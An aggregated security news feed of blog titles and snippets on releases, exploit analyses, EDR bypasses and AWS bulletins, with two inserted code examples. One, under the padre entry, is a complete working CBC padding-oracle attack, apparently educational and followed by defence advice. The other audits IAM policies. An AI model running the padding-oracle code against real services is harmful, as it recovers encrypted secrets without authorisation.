Audio deepfakes: Celebrity-endorsed giveaway scams and fraudulent investment opportunities flood social media platforms
Bitdefender Labs has been keeping up with the latest modus operandi of cybercrooks who adapt emerging technologies to siphon money from consumers. Artificial intelligence is just one of the many tools that help in the creation and successful dissemination of online schemes to extort money and sensitive information. This paper focuses on voice cloning (audio deepfakes) schemes and how they are proliferated via social media to trick unsuspecting victims. Before delving deeper into the main subj
https://www.bitdefender.com/en-us/blog/labs/audio-deepfakes-celebrity-endorsed-giveaway-scams-and-fraudulent-investment-opportunities-flood-social-media-platforms/

Decrypted: Rhysida Ransomware
The team at Avast has developed a decryptor for the Rhysida ransomware and released it for public download. The Rhysida ransomware has been active since May 2023. As of Feb 2024, their TOR site lists 78 attacked companies, including IT (Information Technology) sector, healthcare, universities, and government organizations. The post Decrypted: Rhysida Ransomware appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/decrypted-rhysida-ransomware/?utm_source=rss&utm_medium=rss&utm_campaign=decrypted-rhysida-ransomware

Bypassing EDRs With EDR-Preloading
Evading user mode EDR hooks by hijacking the AppVerifier layer
https://malwaretech.com/2024/02/bypassing-edrs-with-edr-preload.html

ClamAV 1.3.0 feature release and 1.2.2, 1.0.5 security patch release!
The ClamAV 1.3.0 feature release is now stable! Today, we are also publishing the 1.2.2 and 1.0.5 security patch versions. ClamAV 1.1 is past EOL for security fixes and will not receive an update. Switch to the 1.0 LTS, 1.2, or 1.3 versions for continued support. The release files are available for download on the ClamAV downloads page, on the Github Release page, and through Docker Hub* (Alpine-based images; Debian-based multi-arch images). *The Docker images are built on release day and may not be available until later in the day. Continue reading to learn what changed in each version. 1.3.0: ClamAV 1.3.0 includes the following improvements and changes: Major changes: Added support for extracting and scanning attachments found in Microsoft OneNote section files. OneNote parsing will be enabled by default,...
http://blog.clamav.net/2023/11/clamav-130-122-105-released.html

CVE-2024-21626 - Runc container issue
Publication Date: 2024/01/31 1:30 PM PST CVE Identifier: CVE-2024-21626 AWS is aware of a recently disclosed security issue affecting the runc component of several open source container management systems (CVE-2024-21626). With the exception of the AWS services listed below, no customer action is required to address this issue. Amazon Linux An updated version of runc is available for Amazon Linux 1 (runc-1.1.11-1.0.amzn1), Amazon Linux 2 (runc-1.1.11-1.amzn2) and for Amazon Linux 2023 (runc-1.1.11-1.amzn2023). AWS recommends that customers using runc or other container-related software apply those updates or a newer version. Further information is available in the Amazon Linux Security Center. Bottlerocket OS An updated version of runc will be included in Bottlerocket 1.19.0, which will...
https://aws.amazon.com/security/security-bulletins/AWS-2024-001/

ClamAV 1.3.0 Second Release Candidate now available!
We are excited to announce the ClamAV 1.3.0 release candidate. You can find the source code and installers for this release on the clamav.net/downloads page or the ClamAV GitHub release page. Tip: If you are downloading the source from the GitHub release page, the package labeled "clamav-1.3.0-rc2.tar.gz" does not require an internet connection to build. All dependencies are included in this package. But if you download the ZIP or TAR.GZ generated by GitHub, located at the very bottom, then an internet connection will be required during the build to download additional Rust dependencies. For Docker users, there is no specific Docker tag for the release candidate, but you can use these tags: clamav/clamav:unstable, clamav/clamav:unstable_base, clamav/clamav-debian:unstable, clamav/clamav-debian:unstable_base. This...
http://blog.clamav.net/2024/01/clamav-130-second-release-candidate-now.html

ClamAV Debian multi-Arch Docker images now available!
We now offer official ClamAV docker images based on `debian:11-slim`. In addition to offering an alternative to the original Alpine Linux images, the new images are multi-arch images supporting `linux/amd64`, `linux/arm64`, and `linux/ppc64le`. ClamAV's Alpine-based and Debian-based Docker images are now built weekly to pick up security fixes in the base images. Check it out here.
http://blog.clamav.net/2024/01/clamav-debian-multi-arch-docker-images.html

How to Recover an Unsaved Excel File
If your Excel file was left unsaved by accident, don’t fret – Microsoft understands mistakes happen and provides built-in functionality to help recover it. To recover an unsaved file, navigate... The post How to Recover an Unsaved Excel File appeared first on Hacker Combat.
https://www.hackercombat.com/how-to-recover-unsaved-excel-file/

Best EDR Of The Market (BEOTM) – Endpoint Detection and Response Testing Tool
BestEDROfTheMarket is a naive user-mode EDR (Endpoint Detection and Response) tool designed to serve as a testing ground
https://www.darknet.org.uk/2024/01/best-edr-of-the-market-beotm-endpoint-detection-and-response-testing-tool/

Silly EDR Bypasses and Where To Find Them
Abusing exception handlers to hook and bypass user mode EDR hooks.
https://malwaretech.com/2023/12/silly-edr-bypasses-and-where-to-find-them.html

An Introduction to Bypassing User Mode EDR Hooks
Understanding the basics of user mode EDR hooking, common bypass techniques, and their limitations.
https://malwaretech.com/2023/12/an-introduction-to-bypassing-user-mode-edr-hooks.html

ClamAV 1.3.0 release candidate now available!
The ClamAV 1.3.0 release candidate is now available. You may find the source code and installers for this release on the clamav.net/downloads page or the ClamAV GitHub release page. Tip: If you are downloading the source from the GitHub release page, the package labeled "clamav-1.3.0-rc.tar.gz" does not require an internet connection to build. All dependencies are included in this package. But if you download the ZIP or TAR.GZ generated by GitHub, located at the very bottom, then an internet connection will be required during the build to download additional Rust dependencies. For Docker users, there is no specific Docker tag for the release candidate, but you can use the clamav:unstable or clamav:unstable_base tags. The release candidate phase is expected...
http://blog.clamav.net/2023/12/clamav-130-release-candidate-now.html

First handset with MTE on the market
By Mark Brand, Google Project Zero. Introduction: It's finally time for me to fulfill a long-standing promise. Since I first heard about ARM's Memory Tagging Extensions, I've said (to far too many people at this point to be able to back out…) that I'd immediately switch to the first available device that supported this feature. It's been a long wait (since late 2017) but with the release of the new Pixel 8 / Pixel 8 Pro handsets, there's finally a production handset that allows you to enable MTE! The ability of MTE to detect memory corruption exploitation at the first dangerous access is a significant improvement in diagnostic and potential security effectiveness. The availability of MTE on a production handset for the first time is a big step forward, and I think there's...
https://googleprojectzero.blogspot.com/2023/11/first-handset-with-mte-on-market.html

ClamAV 1.2.1, 1.1.3, 1.0.4, 0.103.11 patch versions published
Today, we are publishing the 1.2.1, 1.1.3, 1.0.4, and 0.103.11 security patch versions. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and through Docker Hub. Continue reading to learn what changed in each version. 1.2.1: ClamAV 1.2.1 is a patch release with the following fixes: Eliminate security warning about unused "atty" dependency. GitHub pull request. Upgrade the bundled UnRAR library (libclamunrar) to version 6.2.12. GitHub pull request. Build system: Fix link error with Clang/LLVM/LLD version 17. Patch courtesy of Yasuhiro Kimura. GitHub pull request. Fix alert-exceeds-max feature for files > 2GB and < max-filesize. GitHub pull request. Special thanks to Yasuhiro Kimura for code contributions and bug reports. 1.1.3: ClamAV...
http://blog.clamav.net/2023/10/clamav-121-113-104-010311-patch.html

Implementing a “Share on Mastodon” button for a blog
I decided that I would make it easier for people to share my articles on social media, most importantly on Mastodon. However, my Hugo theme didn't support showing a “Share on Mastodon” button yet. It wasn't entirely trivial to add support either: unlike with centralized solutions like Facebook where a simple link is sufficient, here one would need to choose their home instance first. As far as existing solutions go, the only reasonably sophisticated approach appears to be Share₂Fedi. It works nicely, privacy-wise one could do better however. So I ended up implementing my own solution while also generalizing that solution to support a variety of different Fediverse applications in addition to Mastodon. Contents: Why not Share₂Fedi?; Share on Mastodon or on Fediverse?; ...
https://palant.info/2023/10/19/implementing-a-share-on-mastodon-button-for-a-blog/

An analysis of an in-the-wild iOS Safari WebContent to GPU Process exploit
By Ian Beer. (Figure: A graph representation of the sandbox escape NSExpression payload.) In April this year Google's Threat Analysis Group, in collaboration with Amnesty International, discovered an in-the-wild iPhone zero-day exploit chain being used in targeted attacks delivered via malicious link. The chain was reported to Apple under a 7-day disclosure deadline and Apple released iOS 16.4.1 on April 7, 2023 fixing CVE-2023-28206 and CVE-2023-28205. Over the last few years Apple has been hardening the Safari WebContent (or "renderer") process sandbox attack surface on iOS, recently removing the ability for the WebContent process to access GPU-related hardware directly. Access to graphics-related drivers is now brokered via a GPU process which runs in a separate sandbox. ...
https://googleprojectzero.blogspot.com/2023/10/an-analysis-of-an-in-the-wild-ios-safari-sandbox-escape.html

It might Be Time to Rethink Phishing Awareness
Phishing awareness can be a powerful security tool, or a complete disaster. It all hinges on how you implement it.
https://malwaretech.com/2023/09/it-might-be-time-to-rethink-phishing-awareness.html

Analyzing a Modern In-the-wild Android Exploit
By Seth Jenkins, Project Zero. Introduction: In December 2022, Google's Threat Analysis Group (TAG) discovered an in-the-wild exploit chain targeting Samsung Android devices. TAG's blog post covers the targeting and the actor behind the campaign. This is a technical analysis of the final stage of one of the exploit chains, specifically CVE-2023-0266 (a 0-day in the ALSA compatibility layer) and CVE-2023-26083 (a 0-day in the Mali GPU driver) as well as the techniques used by the attacker to gain kernel arbitrary read/write access. Notably, several of the previous stages of the exploit chain used n-day vulnerabilities: CVE-2022-4262, a 0-day vulnerability in Chrome, was exploited in the Samsung browser to achieve RCE. CVE-2022-3038, a Chrome n-day that was unpatched in the Samsung browser, was used...
https://googleprojectzero.blogspot.com/2023/09/analyzing-modern-in-wild-android-exploit.html

A year after the disastrous breach, LastPass has not improved
In September last year, a breach at LastPass' parent company GoTo (formerly LogMeIn) culminated in attackers siphoning out all data from their servers. The criticism from the security community has been massive. This was not so much because of the breach itself, such things happen, but because of the many obvious ways in which LastPass made matters worse: taking months to notify users, failing to provide useful mitigation instructions, downplaying the severity of the attack, ignoring technical issues which have been publicized years ago and made the attackers' job much easier. The list goes on. Now this has been almost a year ago. LastPass promised to improve, both as far as their communication goes and on the technical side of things. So let's take a look at whether they managed to...
https://palant.info/2023/09/05/a-year-after-the-disastrous-breach-lastpass-has-not-improved/

AgentSmith HIDS – Host Based Intrusion Detection
AgentSmith HIDS is a powerful component of a Host-based Intrusion Detection system, it has anti-rootkit functionalities and is a very performant way to collect information about a host.
https://www.darknet.org.uk/2023/08/agentsmith-hids-host-based-intrusion-detection/

Chrome Sync privacy is still very bad
Five years ago I wrote an article about the shortcomings of Chrome Sync (as well as a minor issue with Firefox Sync). Now Chrome Sync has seen many improvements since then. So time seems right for me to revisit it and to see whether it respects your privacy now. Spoiler: No, it doesn't. It improved, but that's an improvement from outright horrible to merely very bad. The good news: today you can use Chrome Sync in a way that preserves your privacy. Google however isn't interested in helping you figure out how to do it. Contents: The default flow; The privacy-preserving flow; What does Google do with your data?; It could have been worse; Comparison to Firefox Sync. The default flow: Chrome Sync isn't some obscure feature of Google Chrome. In fact, as of Chrome...
https://palant.info/2023/08/29/chrome-sync-privacy-is-still-very-bad/

ClamAV 1.2.0 feature version and 1.1.2, 1.0.3, 0.103.10 patch versions published
The ClamAV 1.2.0 feature release is now stable and available for download on the ClamAV downloads page, on the Github Release page, and through Docker Hub. Today, we are also publishing the 1.1.2, 1.0.3, and 0.103.10 security patch versions. You may be surprised about the impromptu patch release. Indeed, we just published patch versions earlier this month. Unfortunately, a recent CVE for the UnRAR* library has prompted us to prepare these additional updates. We strongly encourage everyone to upgrade to one of these versions. The release files for the patch versions are also available for download on the ClamAV downloads page, on the Github Release page, and through Docker Hub. Because ClamAV 1.2.0 is now the latest release, the release files for version 1.1.2 will be found under the...
http://blog.clamav.net/2023/08/clamav-120-feature-version-and-111-102.html

ClamAV 1.1.1, 1.0.2, 0.103.9 patch versions published
Today, we are releasing the following critical patch versions for ClamAV: 1.1.1, 1.0.2, 0.103.9. ClamAV 0.105 and 0.104 have reached end-of-life according to ClamAV's End of Life (EOL) policy and will not be patched. The release files are available for download on ClamAV.net, on the Github Release page, and through Docker Hub. Note: We observed an issue building ClamAV on Windows using the recently released libjson-c version 0.17. If you are building ClamAV for Windows, you should use libjson-c version 0.16 or prior. 1.1.1: ClamAV 1.1.1 is a critical patch release with the following fixes: CVE-2023-20197: Fixed a possible denial of service vulnerability in the HFS+ file parser. This issue affects versions 1.1.0, 1.0.1 through 1.0.0, 0.105.2 through 0.105.0,...
http://blog.clamav.net/2023/07/2023-08-16-releases.html

MTE As Implemented, Part 1: Implementation Testing
By Mark Brand, Project Zero. Background: In 2018, in the v8.5a version of the ARM architecture, ARM proposed a hardware implementation of tagged memory, referred to as MTE (Memory Tagging Extensions). Through mid-2022 and early 2023, Project Zero had access to pre-production hardware implementing this instruction set extension to evaluate the security properties of the implementation. In particular, we're interested in whether it's possible to use this instruction set extension to implement effective security mitigations, or whether its use is limited to debugging/fault detection purposes. As of the v8.5a specification, MTE can operate in two distinct modes, which are switched between on a per-thread basis. The first mode is sync-MTE, where tag-check failure on a memory access will...
https://googleprojectzero.blogspot.com/2023/08/mte-as-implemented-part-1.html

Why browser extension games need access to all websites
When installing browser extensions in Google Chrome, you are asked to confirm the extension's permissions. In theory, this is supposed to allow assessing the risk associated with an extension. In reality however, users typically lack the knowledge to properly interpret this prompt. For example, I've often seen users accusing extension developers of spying just because the prompt says they could. On the other hand, people will often accept these cryptic prompts without thinking twice. They expect the browser vendors to keep them out of harm's way, trust that isn't always justified [1] [2] [3]. The most extreme scenario here is casual games not interacting with the web at all, yet requesting access to all websites. I found a number of extensions that will abuse this power to hijack...
https://palant.info/2023/06/14/why-browser-extension-games-need-access-to-all-websites/

Another cluster of potentially malicious Chrome extensions
We've already seen Chrome extensions containing obfuscated malicious code. We've also seen PCVARK's malicious ad blockers. When looking for more PCVARK extensions, I stumbled upon an inconspicuous extension called “Translator - Select to Translate.” The only unusual thing about it were its reviews, lots of raving positive reviews mixed with usability complaints. That, and the permissions: why does a translator extension need webRequest and webRequestBlocking permissions? When I looked into this extension, I immediately discovered a strange code block. Supposedly, it was buggy locale processing. In reality, it turned out to be obfuscated malicious logic meant to perform affiliate fraud. That extension wasn't alone. I kept finding similar extensions until I had a list of 109 extensions,...
https://palant.info/2023/06/08/another-cluster-of-potentially-malicious-chrome-extensions/

Introducing PCVARK and their malicious ad blockers
It isn't news that the overwhelming majority of ad blockers in Chrome Web Store is either outright malicious or waiting to accumulate users before turning malicious. So it wasn't a surprise that the very first ad blocker I chose semi-randomly (Adblock Web with 700,000 users) turned out malicious. Starting from it, I found another malicious extension (Ad-Blocker, 700,000 users) and two more that have been removed from Chrome Web Store a year ago (BitSafe Adblocker and Adblocker Unlimited). All these ad blockers and probably some more were developed by the company PCVARK. According to Malwarebytes Labs, this company specializes in developing “potentially unwanted programs.” In other words: they show users warnings about alleged compromise, only to push them into installing their software....
https://palant.info/2023/06/05/introducing-pcvark-and-their-malicious-ad-blockers/

padre – Padding Oracle Attack Exploiter Tool
padre is an advanced exploiter and Padding Oracle attack tool that can be deployed against CBC mode encryption.
https://www.darknet.org.uk/2023/05/padre-padding-oracle-attack-exploiter-tool/
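What a padding-oracle attack against CBC mode actually does, as an added example that is not padre's code and not from the linked post: a toy CBC service that reports only whether decryption produced valid PKCS#7 padding, and the client-side loop that turns that single bit into the whole plaintext. The block cipher (a 4-round Feistel network keyed with HMAC-SHA256, used only because it is invertible and needs no third-party library), the key, the oracle function and the sample plaintext are all constructed here for the demonstration.

```python
"""CBC padding-oracle attack, step by step (added example; not padre's code).

The block cipher below is a toy and must not be used for anything real; the
attack never touches it, which is the point: any CBC endpoint that leaks
padding validity leaks the plaintext, one byte per at most 256 queries.
"""
import hashlib
import hmac
import os

BLOCK = 16
HALF = BLOCK // 2


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key, rnd, half):  # Feistel round function: keyed hash, half a block
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:HALF]


def toy_encrypt_block(key, block):
    left, right = block[:HALF], block[HALF:]
    for rnd in range(4):
        left, right = right, _xor(left, _f(key, rnd, right))
    return left + right


def toy_decrypt_block(key, block):
    left, right = block[:HALF], block[HALF:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _f(key, rnd, left)), left
    return left + right


def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key, plaintext, iv=None):
    prev = iv or os.urandom(BLOCK)
    out = [prev]
    padded = pkcs7_pad(plaintext)
    for i in range(0, len(padded), BLOCK):
        prev = toy_encrypt_block(key, _xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)  # IV || C1 || ... || Cn


def cbc_decrypt(key, ciphertext):
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plain = b"".join(_xor(toy_decrypt_block(key, cur), prev)
                     for prev, cur in zip(blocks, blocks[1:]))
    return pkcs7_unpad(plain)  # the ValueError on bad padding is the leak


def padding_oracle(key, ciphertext):
    """The server, reduced to the one bit it should never reveal."""
    try:
        cbc_decrypt(key, ciphertext)
        return True
    except ValueError:
        return False


def _recover_block(oracle, prev, block):
    """Recover D_k(block) byte by byte, last byte first, then XOR with `prev`."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos
        forged = bytearray(BLOCK)
        for k in range(pos + 1, BLOCK):   # known tail must decrypt to the pad value
            forged[k] = inter[k] ^ pad
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged) + block):
                continue
            if pos == BLOCK - 1:  # rule out an accidental \x02\x02 (or longer) hit
                probe = bytearray(forged)
                probe[pos - 1] ^= 0xFF
                if not oracle(bytes(probe) + block):
                    continue
            inter[pos] = guess ^ pad
            break
        else:
            raise RuntimeError("oracle never accepted a byte; not a padding oracle?")
    return _xor(bytes(inter), prev)


def padding_oracle_attack(oracle, ciphertext):
    """Decrypt IV||C1..Cn with no key, using only the oracle's yes/no answers."""
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plain = b"".join(_recover_block(oracle, prev, cur)
                     for prev, cur in zip(blocks, blocks[1:]))
    return pkcs7_unpad(plain)


if __name__ == "__main__":
    key = os.urandom(BLOCK)  # never seen by the attacker
    ct = cbc_encrypt(key, b"session=4f1c9a; role=admin")
    print(padding_oracle_attack(lambda c: padding_oracle(key, c), ct))
```

The oracle answers at most 256 questions per recovered byte, plus one disambiguation probe for the final byte of each block, so a two-block message falls in a few thousand requests. The defence does not depend on which tool is used to exploit it: authenticate the ciphertext (AES-GCM, or encrypt-then-MAC) and return one uniform error, so a padding failure is indistinguishable from any other decryption failure, in both the response and its timing.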

Issue With IAM Supporting Multiple MFA Devices
Initial Publication Date: 04/25/2023 10:00AM EST A security researcher recently reported an issue with AWS's recently-released (November 16th, 2022) support for multiple multi-factor authentication (MFA) devices for IAM user principals. The reported issue could have potentially arisen only when the following three conditions were met: (1) An IAM user had possession of long-term access key (AK)/secret key (SK) credentials, (2) that IAM user had the privilege to add an MFA to their own identity without using an MFA, and (3) that IAM user's overall access privileges beyond console sign-in had been configured by an administrator to be greater after adding the MFA. Under those narrow conditions, possession of AK/SK alone was equivalent to possession of AK/SK and a previously configured MFA....
https://aws.amazon.com/security/security-bulletins/AWS-2023-001/
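A static check for the three-condition pattern the bulletin describes, as an added example that is not AWS code. The policy language is reduced to Allow statements, wildcard actions and the aws:MultiFactorAuthPresent condition key; explicit Deny statements, resource and principal evaluation are out of scope, and both policy documents are constructed for the illustration. The second document is one hardened option (enrolment itself requires MFA, so the first device is registered by an administrator or from a console session that already carries MFA). The check targets the permission pattern the bulletin lists, not the service-side behaviour.

```python
"""Audit IAM policies for the self-elevation pattern in the bulletin above.

Added example, not AWS code. Reduced model: Allow statements, wildcard
Action strings, and aws:MultiFactorAuthPresent under Bool/BoolIfExists.
Both policy documents are constructed for the illustration.
"""
import fnmatch
import json

# IAM actions that register a new MFA device for a principal.
ENROL_ACTIONS = ("iam:createvirtualmfadevice", "iam:enablemfadevice")

# Conditions (2) and (3) from the bulletin in one policy: the user may enrol an
# MFA device with no MFA on the request, and gains broad rights once one is present.
SELF_SERVICE_MFA = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "EnrolOwnMfa", "Effect": "Allow",
         "Action": ["iam:CreateVirtualMFADevice", "iam:EnableMFADevice", "iam:ListMFADevices"],
         "Resource": ["arn:aws:iam::*:mfa/${aws:username}", "arn:aws:iam::*:user/${aws:username}"]},
        {"Sid": "AdminOnlyWithMfa", "Effect": "Allow", "Action": ["s3:*", "ec2:*"],
         "Resource": "*", "Condition": {"Bool": {"aws:MultiFactorAuthPresent": "true"}}},
    ],
})

# One hardened variant: enrolment itself requires MFA, so the first device is
# registered by an administrator or from an already-MFA'd console session.
ADMIN_ENROLLED_MFA = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "ListOwnMfa", "Effect": "Allow", "Action": "iam:ListMFADevices",
         "Resource": "arn:aws:iam::*:user/${aws:username}"},
        {"Sid": "ManageOwnMfaWithMfa", "Effect": "Allow",
         "Action": ["iam:CreateVirtualMFADevice", "iam:EnableMFADevice"],
         "Resource": ["arn:aws:iam::*:mfa/${aws:username}", "arn:aws:iam::*:user/${aws:username}"],
         "Condition": {"Bool": {"aws:MultiFactorAuthPresent": "true"}}},
        {"Sid": "AdminOnlyWithMfa", "Effect": "Allow", "Action": ["s3:*", "ec2:*"],
         "Resource": "*", "Condition": {"Bool": {"aws:MultiFactorAuthPresent": "true"}}},
    ],
})


def _listify(value):
    return value if isinstance(value, list) else [value]


def _mfa_condition(stmt):
    """'true'/'false' when the statement tests aws:MultiFactorAuthPresent, else None."""
    cond = stmt.get("Condition", {})
    for operator in ("Bool", "BoolIfExists"):
        value = cond.get(operator, {}).get("aws:MultiFactorAuthPresent")
        if value is not None:
            return str(_listify(value)[0]).lower()
    return None


def audit_mfa_elevation(policies, has_long_term_keys):
    """policies: {name: policy JSON string} attached to one IAM user.

    Returns the evidence for each of the bulletin's three conditions and
    whether all of them hold at once (the case where AK/SK alone was
    equivalent to AK/SK plus an MFA device)."""
    self_enrol, mfa_gated = [], []
    for name, document in policies.items():
        for stmt in _listify(json.loads(document)["Statement"]):
            if stmt.get("Effect") != "Allow":
                continue
            mfa = _mfa_condition(stmt)
            for action in (a.lower() for a in _listify(stmt.get("Action", []))):
                # `action` may carry wildcards (iam:*), so it is the pattern.
                enrols = any(fnmatch.fnmatch(e, action) for e in ENROL_ACTIONS)
                if enrols and mfa != "true":
                    self_enrol.append(f"{name}/{stmt.get('Sid', '?')}: {action}")
                elif mfa == "true":
                    mfa_gated.append(f"{name}/{stmt.get('Sid', '?')}: {action}")
    return {
        "long_term_keys": has_long_term_keys,    # condition (1)
        "self_enrol_without_mfa": self_enrol,    # condition (2)
        "mfa_gated_privileges": mfa_gated,       # condition (3)
        "exploitable": bool(has_long_term_keys and self_enrol and mfa_gated),
    }


if __name__ == "__main__":
    for label, doc in (("self-service", SELF_SERVICE_MFA), ("admin-enrolled", ADMIN_ENROLLED_MFA)):
        print(label, audit_mfa_elevation({"mfa-policy": doc}, has_long_term_keys=True))
```

Run this over every policy attached to a user that also holds long-term access keys; an "exploitable" result means the MFA condition on the gated statements was only ever as strong as the keys themselves. Users whose only credential is a console password do not meet condition (1) and are reported as not exploitable.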

Privacy Implications of Web 3.0 and Darknets
The evolution of the internet has been rapid over the years and has impacted the privacy implications of Web 3.0 and Darknets
https://www.darknet.org.uk/2023/03/privacy-implications-of-web-3-0-and-darknets/

DataSurgeon – Extract Sensitive Information (PII) From Logs
DataSurgeon (ds) is a versatile tool designed to extract sensitive information (PII) from logs; it is intended for incident response, penetration testing, and CTF challenges.
https://www.darknet.org.uk/2023/03/datasurgeon-extract-sensitive-information-pii-from-logs/

We're going teetotal: It's goodbye to The Daily Swig
PortSwigger today announces that The Daily Swig is closing down
https://portswigger.net/daily-swig/were-going-teetotal-its-goodbye-to-the-daily-swig

Bug Bounty Radar // The latest bug bounty programs for March 2023
New web targets for the discerning hacker
https://portswigger.net/daily-swig/bug-bounty-radar-the-latest-bug-bounty-programs-for-march-2023

Indian transport ministry flaws potentially allowed creation of counterfeit driving licenses
Armed with personal data fragments, a researcher could also access 185 million citizens' PII
https://portswigger.net/daily-swig/indian-transport-ministry-flaws-potentially-allowed-creation-of-counterfeit-driving-licenses

Password managers: A rough guide to enterprise secret platforms
The second part of our password manager series looks at business-grade tech to handle API tokens, login credentials, and more
https://portswigger.net/daily-swig/password-managers-a-rough-guide-to-enterprise-secret-platforms

Chromium bug allowed SameSite cookie bypass on Android devices
Protections against cross-site request forgery could be bypassed
https://portswigger.net/daily-swig/chromium-bug-allowed-samesite-cookie-bypass-on-android-devices

Deserialized web security roundup: Twitter 2FA backlash, GoDaddy suffers years-long attack campaign, and XSS Hunter adds e2e encryption
Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news
https://portswigger.net/daily-swig/deserialized-web-security-roundup-twitter-2fa-backlash-godaddy-suffers-years-long-attack-campaign-and-xss-hunter-adds-e2e-encryption

NIST plots biggest ever reform of Cybersecurity Framework
CSF 2.0 blueprint offered up for public review
https://portswigger.net/daily-swig/nist-plots-biggest-ever-reform-of-cybersecurity-framework

Cisco ClamAV anti-malware scanner vulnerable to serious security flaw
Patch released for bug that poses a critical risk to vulnerable technologies
https://portswigger.net/daily-swig/cisco-clamav-anti-malware-scanner-vulnerable-to-serious-security-flaw

CVSS system criticized for failure to address real-world impact
JFrog argues vulnerability risk metrics need complete revamp
https://portswigger.net/daily-swig/cvss-system-criticized-for-failure-to-address-real-world-impact

A Realistic Look at Implications of ChatGPT for Cybercrime
Analyzing ChatGPT's capabilities and various claims about how it will revolutionize cybercrime.
https://malwaretech.com/2023/02/a-realistic-look-at-chatgpt-cybercrime.html

‘Most web API flaws are missed by standard security tests’ – Corey J Ball on securing a neglected attack vector
API security is a ‘great gateway’ into a pen testing career, advises specialist in the field
https://portswigger.net/daily-swig/most-web-api-flaws-are-missed-by-standard-security-tests-corey-j-ball-on-securing-a-neglected-attack-vector

HTTP request smuggling bug patched in HAProxy
Exploitation could enable attackers to access backend servers
https://portswigger.net/daily-swig/http-request-smuggling-bug-patched-in-haproxy

Belgium launches nationwide safe harbor for ethical hackers
New legal protections for security researchers could be the strongest of any EU country
https://portswigger.net/daily-swig/belgium-launches-nationwide-safe-harbor-for-ethical-hackers

Pwnagotchi – Maximize Crackable WPA Key Material For Bettercap
Pwnagotchi is an A2C-based "AI" leveraging bettercap that learns from its surrounding WiFi environment to maximize crackable WPA key material it captures
https://www.darknet.org.uk/2023/02/pwnagotchi-maximize-crackable-wpa-key-material-for-bettercap/

Lessons Learned from Cybersecurity Mentoring
I suppose one could say that I’ve been doing this far too long, and I’ve gained some knowledge about how the cybersecurity industry works, and how people succeed or fail at the field. To give back to newcomers, I recently opened up a Calendly to do ad hoc career mentoring, in addition to the career…
https://tisiphone.net/2023/01/03/lessons-learned-from-cybersecurity-mentoring/

HardCIDR – Network CIDR and Range Discovery Tool
HardCIDR is a Linux Bash script to discover the netblocks, or ranges, (in CIDR notation) owned by the target organization during the intelligence gathering phase of a penetration test.
https://www.darknet.org.uk/2022/12/hardcidr-network-cidr-and-range-discovery-tool/

TikTok is a National Security Risk, Not A Privacy One
An analysis of the threat posed by TikTok and why we need to weigh our options carefully.
https://malwaretech.com/2022/12/tiktok-is-a-national-security-risk.html

Career Counseling Office Hours!
I now have some limited appointments for career counseling and resume discussion open for sign-ups. These sessions are free for college students and current enlisted military, and tip-what-you can for everyone else, if you feel my help was meaningful. You can sign up here: https://calendly.com/lesleycarhart Keep in mind that I can only review North American…
https://tisiphone.net/2022/12/05/career-counseling-office-hours/

I've Moved to Mastodon!
Hi friends! I hope you’re having a wonderful Thanksgiving weekend (for the US folks), or a nice weekend regardless of location. I just wanted to drop a quick note to let you all know that from now on the best way to follow my daily social media posts, which include Q&As, cybersecurity news, and news…
https://tisiphone.net/2022/11/26/ive-moved-to-mastodon/

Podcast: Securing Bridges | A Live Stream Podcast With Alyssa Miller | Guest: Lesley Carhart | Episode 28
Via: https://www.itspmagazine.com/securing-bridges-podcast
https://tisiphone.net/2022/11/13/podcast-securing-bridges-a-live-stream-podcast-with-alyssa-miller-guest-lesley-carhart-episode-28/

Infosec Mastodon Lists!
Hi pals! I hear you like lists as folks migrate over to Mastodon. Here are some I will keep relatively updated you may find useful, just to track people down! If you want me to remove you for some reason, contact me by DM or email. You can import these lists in your Mastodon preferences…
https://tisiphone.net/2022/11/10/infosec-mastodon-lists/

Everything you need to know about the OpenSSL 3.0.7 Patch (CVE-2022-3602 & CVE-2022-3786)

https://malwaretech.com/2022/11/everything-you-need-to-know-about-the-openssl-3-0-7-patch.html

CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability
On Tuesday, November 1 2022 between 1300-1700 UTC, the OpenSSL project announced the release of a new version of OpenSSL (version 3.0.7) that will patch a critical vulnerability in OpenSSL version 3.0 and above. Only OpenSSL versions between 3.0 and 3.0.6 are affected at the time of writing. At this moment the details of this [...]
https://www.hackingtutorials.org/general-tutorials/openssl-3-0-7-patches-critical-vulnerability/

(Podcast) ITSP – Martial Arts, Marksmanship, And ICS Cyber Incident Response | A Conversation With Lesley Carhart
https://itspmagazinepodcast.com/episodes/martial-arts-marksmanship-and-ics-cyber-incident-response-a-conversation-with-lesley-carhart-cy-beat-podcast-with-deb-radcliff-2dWkd8yh
https://tisiphone.net/2022/10/10/podcast-itsp-martial-arts-marksmanship-and-ics-cyber-incident-response-a-conversation-with-lesley-carhart/

ASIS Article – Preparing for OT Incident Response
https://www.asisonline.org/security-management-magazine/monthly-issues/security-technology/archive/2022/october/Your-Cyber-Response-Plan-Needs-These-6-Components/ Cybersecurity incidents are no longer a matter of if, but when. Building a good strategy and architecture to deter intrusions is incredibly important in reducing the frequency and severity of incidents, but there is no scenario where any organization is totally immune. That means that every organization must have a plan for what they…
https://tisiphone.net/2022/10/10/asis-article-preparing-for-ot-incident-response/

Student Loan Breach Exposes 2.5M Records
2.5 million people were affected, in a breach that could spell more trouble down the line.
https://threatpost.com/student-loan-breach-exposes-2-5m-records/180492/

